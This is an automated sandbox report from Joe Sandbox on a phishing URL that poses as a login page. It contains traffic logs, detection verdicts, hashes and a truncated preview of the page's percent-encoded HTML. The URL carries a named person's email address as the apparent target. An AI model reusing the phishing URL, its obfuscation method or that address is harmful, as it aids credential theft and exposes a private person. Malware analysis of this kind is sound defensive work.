Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: classification engineClassification label: mal52.phis.win@17/10@8/6
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2032,i,11957097260044928520,15021406713333812890,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2032,i,11957097260044928520,15021406713333812890,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Drive-by Compromise
Windows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com100%Avira URL Cloudmalware
https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com100%SlashNextCredential Stealing type: Phishing & Social Engineering
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
voyages-moinschers.fr
185.221.216.102
truefalse
    unknown
    www.idcom-france.com
    213.186.33.5
    truefalse
      unknown
      www.google.com
      142.250.74.196
      truefalse
        high
        NameMaliciousAntivirus DetectionReputation
        https://www.google.com/s2/favicons?domain=idcom-france.comfalse
          high
          https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.comtrue
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            213.186.33.5
            www.idcom-france.comFrance
            16276OVHFRfalse
            239.255.255.250
            unknownReserved
            unknownunknownfalse
            185.221.216.102
            voyages-moinschers.frUnited Kingdom
            393960HOST4GEEKS-LLCUSfalse
            172.217.16.132
            unknownUnited States
            15169GOOGLEUSfalse
            142.250.74.196
            www.google.comUnited States
            15169GOOGLEUSfalse
            IP
            192.168.2.4
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1560013
            Start date and time:2024-11-21 09:48:22 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 3m 8s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:browseurl.jbs
            Sample URL:https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:8
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal52.phis.win@17/10@8/6
            EGA Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 142.250.186.67, 108.177.15.84, 216.58.206.78, 34.104.35.123, 142.250.185.106, 216.58.212.138, 172.217.18.10, 142.250.185.170, 142.250.74.202, 172.217.18.106, 216.58.212.170, 216.58.206.74, 172.217.23.106, 142.250.185.138, 142.250.186.42, 142.250.184.234, 142.250.186.138, 172.217.16.202, 142.250.186.106, 142.250.185.74, 142.250.186.74, 142.250.186.36, 172.217.23.100, 199.232.210.172, 192.229.221.95, 142.250.185.67
            • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ajax.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, t0.gstatic.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com
            • Not all processes where analyzed, report is missing behavior information
            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • VT rate limit hit for: https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com
            No simulations
            No context
            No context
            No context
            No context
            No context
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 16 x 16, 8-bit colormap, non-interlaced
            Category:dropped
            Size (bytes):247
            Entropy (8bit):6.098146828132587
            Encrypted:false
            SSDEEP:6:6v/lhPfp2pjI1GdSimvUW7gBaGzTUQwobEjp:6v/7A0LHYasTUQwobm
            MD5:E66519E6F28D509878A0C1E8FCFBF369
            SHA1:C7E0767306AB8BDDA86A6E1838A42785D9208932
            SHA-256:501CDCD6F10ADCEF2E83A3ED13E4BD8D74244F9095028AA7327DE9EEBD8F96EE
            SHA-512:AE3B2AF717E93EBD396ECBB937274C3336D60C764EEA825B27390633D3FFD9B134430DC42B49835CDA14F6D9A13C2FEB00B791BB731438D5DCE770133EAC1B24
            Malicious:false
            Reputation:low
            Preview:.PNG........IHDR.............(-.S...3PLTEGpL.?m.?m.?m.?m.?m.?m.?m.?m.?m.?m.?m.?m.?m.?m.?m.?m.<.....tRNS../..G..\.p........B...cIDAT....... .C.."...?m......p.~3E..<.<(v..KE...4.t`...w......]X.pU.b\h...iP....+.....U..p1.25.|.........W....IEND.B`.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 16 x 16, 8-bit colormap, non-interlaced
            Category:downloaded
            Size (bytes):247
            Entropy (8bit):6.098146828132587
            Encrypted:false
            SSDEEP:6:6v/lhPfp2pjI1GdSimvUW7gBaGzTUQwobEjp:6v/7A0LHYasTUQwobm
            MD5:E66519E6F28D509878A0C1E8FCFBF369
            SHA1:C7E0767306AB8BDDA86A6E1838A42785D9208932
            SHA-256:501CDCD6F10ADCEF2E83A3ED13E4BD8D74244F9095028AA7327DE9EEBD8F96EE
            SHA-512:AE3B2AF717E93EBD396ECBB937274C3336D60C764EEA825B27390633D3FFD9B134430DC42B49835CDA14F6D9A13C2FEB00B791BB731438D5DCE770133EAC1B24
            Malicious:false
            Reputation:low
            URL:"https://t0.gstatic.com/faviconV2?client=SOCIAL&type=FAVICON&fallback_opts=TYPE,SIZE,URL&url=http://idcom-france.com&size=16"
            Preview:.PNG........IHDR.............(-.S...3PLTEGpL.?m.?m.?m.?m.?m.?m.?m.?m.?m.?m.?m.?m.?m.?m.?m.?m.<.....tRNS../..G..\.p........B...cIDAT....... .C.."...?m......p.~3E..<.<(v..KE...4.t`...w......]X.pU.b\h...iP....+.....U..p1.25.|.........W....IEND.B`.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with no line terminators
            Category:downloaded
            Size (bytes):28
            Entropy (8bit):4.110577243331642
            Encrypted:false
            SSDEEP:3:Wk6F:j6F
            MD5:610483F85CABBF9E7B09AA3DDB5071F4
            SHA1:862A78D9E6AF34D2B06676F0CBCCC44D560F8016
            SHA-256:79E420D1AECF9D5A6D1E77D7F29C5226B83E97A265B6751B4787E22484DB3E29
            SHA-512:BB65C27EB14C065C34A3376E22CE2D889F2F31B0500A3E46CF92AE0FEFF8AA50293A2C2A151312A71DC88990124B9E996681AAB19C52C6BD2FADFEFDF7BE8F0B
            Malicious:false
            Reputation:low
            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwkFcdhzqzCWcRIFDU6AC8USBQ3OQUx6?alt=proto
            Preview:ChIKBw1OgAvFGgAKBw3OQUx6GgA=
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:HTML document, ASCII text, with very long lines (26600), with CRLF line terminators
            Category:downloaded
            Size (bytes):26685
            Entropy (8bit):3.1258981310131757
            Encrypted:false
            SSDEEP:192:kgr96000T000R000B0007s000SrLeUZTU2yNV6LYgEmKqY6u1LHPyc5fycwhkQ+Z:/bri7V621zBoK/8GB
            MD5:AE334599FE5F51A357EEDED7E0A05B43
            SHA1:D770C69578A65E9243972535C7416CFB9B691DCA
            SHA-256:0E06F110E5EFB4D4E26CA07F9B84DF91328FD1C847E33D760E377F79EAE56999
            SHA-512:5FEC8996D793398DC168E5346C0C5B65850C996B76262A7672DEBA8F0E9A66CEE7EFAE76DD6B14C562CEF728E6EEB11D4549F3D6B9615C657F991F5720441164
            Malicious:false
            Reputation:low
            URL:https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com
            Preview:<!DOCTYPE html>..<html>.. <script language="javascript">.. document.write( unescape( '%3C%68%65%61%64%3E%0A%20%20%20%20%20%20%20%20%3C%74%69%74%6C%65%3E%4C%6F%67%69%6E%20%74%6F%20%79%6F%75%72%20%61%63%63%6F%75%6E%74%3C%2F%74%69%74%6C%65%3E%0A%20%20%20%20%20%20%20%20%3C%6D%65%74%61%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%49%53%4F%2D%38%38%35%39%2D%31%22%20%68%74%74%70%2D%65%71%75%69%76%3D%22%63%6F%6E%74%65%6E%74%2D%74%79%70%65%22%3E%0A%20%20%20%20%20%20%20%20%3C%6D%65%74%61%20%6E%61%6D%65%3D%22%76%69%65%77%70%6F%72%74%22%20%63%6F%6E%74%65%6E%74%3D%22%77%69%64%74%68%3D%64%65%76%69%63%65%2D%77%69%64%74%68%2C%20%69%6E%69%74%69%61%6C%2D%73%63%61%6C%65%3D%31%2E%30%22%3E%0A%20%20%20%20%20%20%20%20%3C%6C%69%6E%6B%20%72%65%6C%3D%22%69%63%6F%6E%22%20%74%79%70%65%3D%22%69%6D%61%67%65%2F%70%6E%67%22%20%69%64%3D%22%66%61%76%69%63%6F%6E%22%20%68%72%65%66%3D%22%22%3E%0A%20%20%20%20%20%20%20%20%3C%6D%65%74%61%20%6E%61%6D%65%3D%22%72%6F%62%6F%74%
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (65451)
            Category:downloaded
            Size (bytes):89476
            Entropy (8bit):5.2896589255084425
            Encrypted:false
            SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
            MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
            SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
            SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
            SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
            Malicious:false
            Reputation:low
            URL:https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js
            Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (65451)
            Category:dropped
            Size (bytes):89476
            Entropy (8bit):5.2896589255084425
            Encrypted:false
            SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
            MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
            SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
            SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
            SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
            Malicious:false
            Reputation:low
            Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
            No static file info
            TimestampSource PortDest PortSource IPDest IP
            Nov 21, 2024 09:49:20.160865068 CET49675443192.168.2.4173.222.162.32
            Nov 21, 2024 09:49:24.471575022 CET49735443192.168.2.4185.221.216.102
            Nov 21, 2024 09:49:24.471616983 CET44349735185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:24.471683025 CET49735443192.168.2.4185.221.216.102
            Nov 21, 2024 09:49:24.473001003 CET49736443192.168.2.4185.221.216.102
            Nov 21, 2024 09:49:24.473072052 CET44349736185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:24.473190069 CET49736443192.168.2.4185.221.216.102
            Nov 21, 2024 09:49:24.473331928 CET49735443192.168.2.4185.221.216.102
            Nov 21, 2024 09:49:24.473341942 CET44349735185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:24.473603010 CET49736443192.168.2.4185.221.216.102
            Nov 21, 2024 09:49:24.473618984 CET44349736185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:25.844002962 CET44349736185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:25.845701933 CET49736443192.168.2.4185.221.216.102
            Nov 21, 2024 09:49:25.845724106 CET44349736185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:25.846892118 CET44349736185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:25.846986055 CET49736443192.168.2.4185.221.216.102
            Nov 21, 2024 09:49:25.848787069 CET49736443192.168.2.4185.221.216.102
            Nov 21, 2024 09:49:25.848897934 CET44349736185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:25.849107027 CET49736443192.168.2.4185.221.216.102
            Nov 21, 2024 09:49:25.882930994 CET44349735185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:25.883364916 CET49735443192.168.2.4185.221.216.102
            Nov 21, 2024 09:49:25.883383989 CET44349735185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:25.884459972 CET44349735185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:25.884516954 CET49735443192.168.2.4185.221.216.102
            Nov 21, 2024 09:49:25.884974957 CET49735443192.168.2.4185.221.216.102
            Nov 21, 2024 09:49:25.885051966 CET44349735185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:25.891324043 CET44349736185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:25.895857096 CET49736443192.168.2.4185.221.216.102
            Nov 21, 2024 09:49:25.895864964 CET44349736185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:25.928689003 CET49735443192.168.2.4185.221.216.102
            Nov 21, 2024 09:49:25.928705931 CET44349735185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:25.944196939 CET49736443192.168.2.4185.221.216.102
            Nov 21, 2024 09:49:25.975487947 CET49735443192.168.2.4185.221.216.102
            Nov 21, 2024 09:49:26.358942032 CET44349736185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:26.358967066 CET44349736185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:26.358977079 CET44349736185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:26.359009981 CET44349736185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:26.359046936 CET49736443192.168.2.4185.221.216.102
            Nov 21, 2024 09:49:26.359066963 CET44349736185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:26.359091043 CET49736443192.168.2.4185.221.216.102
            Nov 21, 2024 09:49:26.403808117 CET49736443192.168.2.4185.221.216.102
            Nov 21, 2024 09:49:26.429433107 CET44349736185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:26.429445982 CET44349736185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:26.429465055 CET44349736185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:26.429562092 CET49736443192.168.2.4185.221.216.102
            Nov 21, 2024 09:49:26.429562092 CET49736443192.168.2.4185.221.216.102
            Nov 21, 2024 09:49:26.567837000 CET44349736185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:26.567856073 CET44349736185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:26.567886114 CET44349736185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:26.567913055 CET49736443192.168.2.4185.221.216.102
            Nov 21, 2024 09:49:26.567960978 CET49736443192.168.2.4185.221.216.102
            Nov 21, 2024 09:49:26.574867964 CET44349736185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:26.574951887 CET49736443192.168.2.4185.221.216.102
            Nov 21, 2024 09:49:26.574959040 CET44349736185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:26.575006008 CET49736443192.168.2.4185.221.216.102
            Nov 21, 2024 09:49:26.575576067 CET49736443192.168.2.4185.221.216.102
            Nov 21, 2024 09:49:26.575592041 CET44349736185.221.216.102192.168.2.4
            Nov 21, 2024 09:49:27.203950882 CET49740443192.168.2.4142.250.74.196
            Nov 21, 2024 09:49:27.204041004 CET44349740142.250.74.196192.168.2.4
            Nov 21, 2024 09:49:27.204250097 CET49740443192.168.2.4142.250.74.196
            Nov 21, 2024 09:49:27.204355001 CET49740443192.168.2.4142.250.74.196
            Nov 21, 2024 09:49:27.204376936 CET44349740142.250.74.196192.168.2.4
            Nov 21, 2024 09:49:27.603234053 CET49741443192.168.2.4184.28.90.27
